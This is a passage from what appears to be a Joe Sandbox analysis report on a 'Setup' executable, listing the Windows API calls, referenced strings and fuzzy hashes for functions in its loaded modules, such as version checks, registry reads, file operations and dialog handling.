                                                                                              • Instruction Fuzzy Hash: 86417971A087409FD710DF68C448B5ABBE4EB8A728F004A1DF8A687390D735E944CF91
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E6E4D
                                                                                                • Part of subcall function 6C8E50B2: __EH_prolog3.LIBCMT ref: 6C8E50B9
                                                                                                • Part of subcall function 6C8E50B2: GetLastError.KERNEL32(00000000,LoadLibrary,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E5110
                                                                                                • Part of subcall function 6C8E50B2: __CxxThrowException@8.LIBCMT ref: 6C8E512D
                                                                                              • GetCommandLineW.KERNEL32(00000000,?), ref: 6C8E6E8F
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                                • Part of subcall function 6C8E516F: FreeLibrary.KERNEL32(00000000,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E517C
                                                                                                • Part of subcall function 6C8E516F: LoadLibraryW.KERNEL32(?,?,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E5194
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C90ABA1: __EH_prolog3.LIBCMT ref: 6C90ABA8
                                                                                                • Part of subcall function 6C90ABA1: GetProcAddress.KERNEL32(00000004,CreateClassFactory), ref: 6C90ABB8
                                                                                                • Part of subcall function 6C90ABA1: GetLastError.KERNEL32 ref: 6C90ABC6
                                                                                                • Part of subcall function 6C90ABA1: __CxxThrowException@8.LIBCMT ref: 6C90AC7D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ErrorException@8LastLibraryThrow$AddressCommandFreeLineLoadProc_malloc
                                                                                              • String ID: passive
                                                                                              • API String ID: 304155978-1995439567
                                                                                              • Opcode ID: 5fe9b76c54f95009eddd1a9105631c8528b61025b7e958d782154aad814d0c03
                                                                                              • Instruction ID: cb4ecbc448005b2f40559b2e9137a6c8e1a7b928bf395864284745e9152dafea
                                                                                              • Opcode Fuzzy Hash: 5fe9b76c54f95009eddd1a9105631c8528b61025b7e958d782154aad814d0c03
                                                                                              • Instruction Fuzzy Hash: 1531CF7191534A9BDB20DFA8CA007DEBBB0AF29318F104D69D951A7F80CB70DA098B91
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D57EC
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • _memcpy_s.LIBCMT ref: 6C8D5887
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$_memcpy_s
                                                                                              • String ID: #(loc.
                                                                                              • API String ID: 1663610674-1630946291
                                                                                              • Opcode ID: 3a6eb39598482636c6af2c0ecd43eaff469841d480f0c2ca265542a0bf8875dc
                                                                                              • Instruction ID: bdc067426ef4d84ecd761a47f3a3e3b832b0b347ad2a210ed5d931d801b2ad6f
                                                                                              • Opcode Fuzzy Hash: 3a6eb39598482636c6af2c0ecd43eaff469841d480f0c2ca265542a0bf8875dc
                                                                                              • Instruction Fuzzy Hash: 5B31A2319042189FCF10DFA8C944ADE77A5EF10368F158A56E9249FF90C730EE49CB90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8FEA7B
                                                                                              • GetComputerObjectNameW.SECUR32(00000007,00000000,6C8FFA6E), ref: 6C8FEAC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerH_prolog3NameObject
                                                                                              • String ID: microsoft.com
                                                                                              • API String ID: 4212761916-499418652
                                                                                              • Opcode ID: 401195210c8d137675fcb7590bf0346c3a40d61c194cba3181c813bdfc5f7230
                                                                                              • Instruction ID: 7ccc36afa7ab22a816bed642cf9859085b7ad90d0b1cc8c5f20b7ca282d980a0
                                                                                              • Opcode Fuzzy Hash: 401195210c8d137675fcb7590bf0346c3a40d61c194cba3181c813bdfc5f7230
                                                                                              • Instruction Fuzzy Hash: A921F330A102199BCF14DFB8C9455FEB772AF2235CF204A2AD031A7BD0DB70D90A87A1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7DB7
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C4CB2: __EH_prolog3.LIBCMT ref: 6C8C4CB9
                                                                                                • Part of subcall function 6C8C395E: __EH_prolog3.LIBCMT ref: 6C8C3965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Operation Type$Operation: %s
                                                                                              • API String ID: 431132790-3288381836
                                                                                              • Opcode ID: ecec097de77c837f0f06d0305e70dc92ad26c2f0105a0166caa007ada11197ca
                                                                                              • Instruction ID: 792157d50396e2a840a83062fd49521549eba6cf9d57f194560a723bacf3f70d
                                                                                              • Opcode Fuzzy Hash: ecec097de77c837f0f06d0305e70dc92ad26c2f0105a0166caa007ada11197ca
                                                                                              • Instruction Fuzzy Hash: AD217C71900109DFCB10DBE8C945ADEBBB9AF25208F104459E140EBB51C774DA09CBA5
                                                                                              APIs
                                                                                              • _wcsnlen.LIBCMT ref: 6C8FFF54
                                                                                              • _memcpy_s.LIBCMT ref: 6C8FFF8A
                                                                                                • Part of subcall function 6C918E8C: __CxxThrowException@8.LIBCMT ref: 6C918EA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                                                              • String ID: OS Version Information
                                                                                              • API String ID: 31407445-551053750
                                                                                              • Opcode ID: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                                                              • Instruction ID: 487046e34aaf4732d3109e1e39a2e22182ec343c12656df8b06020cb1a77b692
                                                                                              • Opcode Fuzzy Hash: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                                                              • Instruction Fuzzy Hash: EA01C832604108AF9B14DF68CC45C9D77E9DBA53A4715852EF5249BB50EA30EA15CB90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E5325
                                                                                                • Part of subcall function 6C918AFC: _wcsnlen.LIBCMT ref: 6C918B0C
                                                                                              • DeleteFileW.KERNEL32(?,00000010,HFI,00000000,?,6C8BAB18,00000004,6C90A448,38D98A99,38D98A99,?,?,6C8F4B23), ref: 6C8E5399
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                                                              • String ID: HFI
                                                                                              • API String ID: 1332513528-686494941
                                                                                              • Opcode ID: c2beb689c26f894be4aac4a8ea516b1060af238c6b0735193d2d588055861696
                                                                                              • Instruction ID: 8b6b3c1e79f3059867542bd2c67298990e00dde7ce0f7a80e5a6b22987e9726f
                                                                                              • Opcode Fuzzy Hash: c2beb689c26f894be4aac4a8ea516b1060af238c6b0735193d2d588055861696
                                                                                              • Instruction Fuzzy Hash: 6611E5313102089FC7189FB8C9416EEB7A1AF3631CB114A26E4619BF94D770D918A694
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C903573
                                                                                                • Part of subcall function 6C8C579B: _memset.LIBCMT ref: 6C8C57CA
                                                                                                • Part of subcall function 6C8C579B: GetVersionExW.KERNEL32 ref: 6C8C57DF
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 6C8C57F5
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 6C8C57FD
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000001,?,00000001,00000001), ref: 6C8C5805
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000001,?,00000020,00000001,?,00000001,00000001), ref: 6C8C580D
                                                                                                • Part of subcall function 6C8C579B: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C8C5818
                                                                                              Strings
                                                                                              • CSDReleaseType, xrefs: 6C9035CC
                                                                                              • SYSTEM\CurrentControlSet\Control\Windows, xrefs: 6C9035E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConditionMask$Version$H_prolog3InfoVerify_memset
                                                                                              • String ID: CSDReleaseType$SYSTEM\CurrentControlSet\Control\Windows
                                                                                              • API String ID: 3830908078-406884543
                                                                                              • Opcode ID: abc5debcbec999d05dbea20b07a356bffca31a413b1fb5969bf21aa21eae9634
                                                                                              • Instruction ID: a37d1a941a8759d7abd1fd270c2ac11f00545e31b7bd071dd9d8095da1a3595f
                                                                                              • Opcode Fuzzy Hash: abc5debcbec999d05dbea20b07a356bffca31a413b1fb5969bf21aa21eae9634
                                                                                              • Instruction Fuzzy Hash: 1701A5B2D101286BDB148F28C912BE93694BB11398F064566FD69EB741C339DA04DA91
                                                                                              APIs
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,6C8FFA6E,?,?,?,?,?,?,6C9034F1,6C8FFA6E,000000FF), ref: 6C901637
                                                                                              • GetLastError.KERNEL32(?,6C8FFA6E,?,?,?,?,?,?,6C9034F1,6C8FFA6E,000000FF,?,?,00000738,6C8FFA6E,?), ref: 6C901647
                                                                                                • Part of subcall function 6C8C7479: __EH_prolog3.LIBCMT ref: 6C8C7480
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskErrorFreeH_prolog3LastSpace
                                                                                              • String ID: GetDiskFreeSpaceEx
                                                                                              • API String ID: 3776785849-3355056173
                                                                                              • Opcode ID: 5061ce2453e4d358babcbe9a7c1988031c4ce2d6c3d78e680ab1e382c21b48a5
                                                                                              • Instruction ID: cc8be270c55f0d0c878d6c231fc3e7586119d473eb6042c8101d68fc509c9baf
                                                                                              • Opcode Fuzzy Hash: 5061ce2453e4d358babcbe9a7c1988031c4ce2d6c3d78e680ab1e382c21b48a5
                                                                                              • Instruction Fuzzy Hash: 120116B6A00219FB8B00DFD9D9458EEBBB9EB99714F114459E905B3200D770AB09CBD0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8FEC61
                                                                                                • Part of subcall function 6C8F3B2B: __EH_prolog3.LIBCMT ref: 6C8F3B32
                                                                                                • Part of subcall function 6C8F3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?,?), ref: 6C8F3BC9
                                                                                                • Part of subcall function 6C902C16: PathFileExistsW.SHLWAPI(00000000), ref: 6C902CA8
                                                                                                • Part of subcall function 6C902C16: __CxxThrowException@8.LIBCMT ref: 6C902CE7
                                                                                                • Part of subcall function 6C902C16: CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C902D19
                                                                                                • Part of subcall function 6C902C16: SetFileAttributesW.KERNEL32(?,00000080), ref: 6C902D32
                                                                                              • InitializeCriticalSection.KERNEL32(?,?,?,.html,00000001,00000000,6C8F747C,00000000,00000000,?,?,?,?,?,?,?), ref: 6C8FECBB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CriticalH_prolog3InitializeSection$AttributesCopyException@8ExistsPathThrow
                                                                                              • String ID: .html
                                                                                              • API String ID: 4277916732-2179875201
                                                                                              • Opcode ID: 8d5bd68876e84e7a45ace5caf358e479be5ae864fb2c1b81a90114efe5bded9e
                                                                                              • Instruction ID: fdd3975b641f8fd1a58fe311d55a9b5d931ca139dff5a594d34a911f966f847f
                                                                                              • Opcode Fuzzy Hash: 8d5bd68876e84e7a45ace5caf358e479be5ae864fb2c1b81a90114efe5bded9e
                                                                                              • Instruction Fuzzy Hash: 22F0A935600246EBDB05EBA486897DCB7A57F3430CF5084589504ABF40CB74EE1DE7A2
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 63956636
                                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,639572CF), ref: 63956648
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create
                                                                                              • String ID: tooltips_class32
                                                                                              • API String ID: 870168347-1918224756
                                                                                              • Opcode ID: 5a6efc6569761212c73502d48a3aff133ed62b83b9d4a9ea0cc79018be0fb146
                                                                                              • Instruction ID: 53cf804df0703340e8a56bad5c8d67c0c329da9e6e203c722786b07cd529638a
                                                                                              • Opcode Fuzzy Hash: 5a6efc6569761212c73502d48a3aff133ed62b83b9d4a9ea0cc79018be0fb146
                                                                                              • Instruction Fuzzy Hash: BFE04CB15471317EE6706A5AAC0CFE76E5CEF476B4F214214792CE6181D6205910CBF4
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90A1ED
                                                                                              • GetCurrentProcessId.KERNEL32(00000020,6C8E53D9,00000000,?,?,6C8F4B23), ref: 6C90A1FD
                                                                                                • Part of subcall function 6C8E5238: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000), ref: 6C8E5254
                                                                                                • Part of subcall function 6C8E5238: _memset.LIBCMT ref: 6C8E526E
                                                                                                • Part of subcall function 6C8E5238: Process32FirstW.KERNEL32(00000000,?), ref: 6C8E5288
                                                                                                • Part of subcall function 6C8E5238: CloseHandle.KERNEL32(00000000), ref: 6C8E52B7
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                                • Part of subcall function 6C8F8608: __wcsicoll.LIBCMT ref: 6C8F8626
                                                                                              • GetTempPathW.KERNEL32(00000104,00000000,6C8F4B23,6C8F4614,6C8F4B23,00000000,00000010,00000010,?,00000000,6C8F4614,?,?,6C8F4B23), ref: 6C90A415
                                                                                                • Part of subcall function 6C8E5238: Process32NextW.KERNEL32(00000000,0000022C), ref: 6C8E52A3
                                                                                                • Part of subcall function 6C918AFC: _wcsnlen.LIBCMT ref: 6C918B0C
                                                                                                • Part of subcall function 6C8E531E: __EH_prolog3.LIBCMT ref: 6C8E5325
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Process32$CloseCreateCurrentFirstHandleNextPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset_wcsnlen
                                                                                              • String ID:
                                                                                              • API String ID: 3082661801-0
                                                                                              • Opcode ID: ba9cd797fe303d8d195b2771051013c7bb4a2a9ac2e643577a3ab32486cfd9e3
                                                                                              • Instruction ID: f241fe7cf9b688b703ac7e2fac1f466ae47121f0a952457b2ef87ba6af62e5bd
                                                                                              • Opcode Fuzzy Hash: ba9cd797fe303d8d195b2771051013c7bb4a2a9ac2e643577a3ab32486cfd9e3
                                                                                              • Instruction Fuzzy Hash: 4391C171904208CFDB14DFBCC949ADDBBB5BF29328F144A59E050ABB81DB34D908DBA5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C909893
                                                                                              • GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C4412: __EH_prolog3.LIBCMT ref: 6C8C4419
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C53D4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000105,00000010,6C94EE70,?,?,?,?,6C90995C,00000000,?,UiInfo.xml,?,?,00000000), ref: 6C8C5412
                                                                                                • Part of subcall function 6C8C53D4: ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,6C90995C,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C8C5440
                                                                                              • PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$EnvironmentExpandPathStrings$AppendCommandFileLineModuleNameRelative
                                                                                              • String ID:
                                                                                              • API String ID: 168041992-0
                                                                                              • Opcode ID: 1ac61e5819073f6a6bb714b8e2553af46fe9081ea3f65de430aae9b088355679
                                                                                              • Instruction ID: 333653f6858c7f2915cd51a105850ee3d5059c49fc9b82d4323545f469cbacc2
                                                                                              • Opcode Fuzzy Hash: 1ac61e5819073f6a6bb714b8e2553af46fe9081ea3f65de430aae9b088355679
                                                                                              • Instruction Fuzzy Hash: E4416F31A0414DDFCF10DBF8C945AEEBBB5BF15318F244556E020A7B81CB38DA199766
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C5D2E5E,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D1897
                                                                                              • RegQueryValueExW.KERNEL32(6C5D2E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D18B3
                                                                                              • RegCloseKey.KERNEL32(6C5D2E5E,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D18D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: c18aad4c01f906f308bb027408cf7f2e8dbc514ab5bdf1f56b8aeb92e0874834
                                                                                              • Instruction ID: c0e78fed707a88cd83fbd6c9513eddcc314e9d7f13565e219b5fba9dd79265fb
                                                                                              • Opcode Fuzzy Hash: c18aad4c01f906f308bb027408cf7f2e8dbc514ab5bdf1f56b8aeb92e0874834
                                                                                              • Instruction Fuzzy Hash: 2831B231601385AFDB04DF59DC80E9B3BF9EB55359F56026AF920D6A61C330E984CB98
                                                                                              APIs
                                                                                                • Part of subcall function 6394F24C: GetDlgItem.USER32(?), ref: 6394F257
                                                                                                • Part of subcall function 6394F24C: SetWindowTextW.USER32(00000000,?), ref: 6394F286
                                                                                                • Part of subcall function 6394F24C: ShowWindow.USER32(00000000,00000005), ref: 6394F28F
                                                                                                • Part of subcall function 6394F24C: KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 6394F2AE
                                                                                                • Part of subcall function 6394F24C: ShowWindow.USER32(00000000,00000000), ref: 6394F2A5
                                                                                              • GetDlgItem.USER32(?,00003024), ref: 6394F479
                                                                                              • GetWindowLongW.USER32(00000000,000000EB), ref: 6394F484
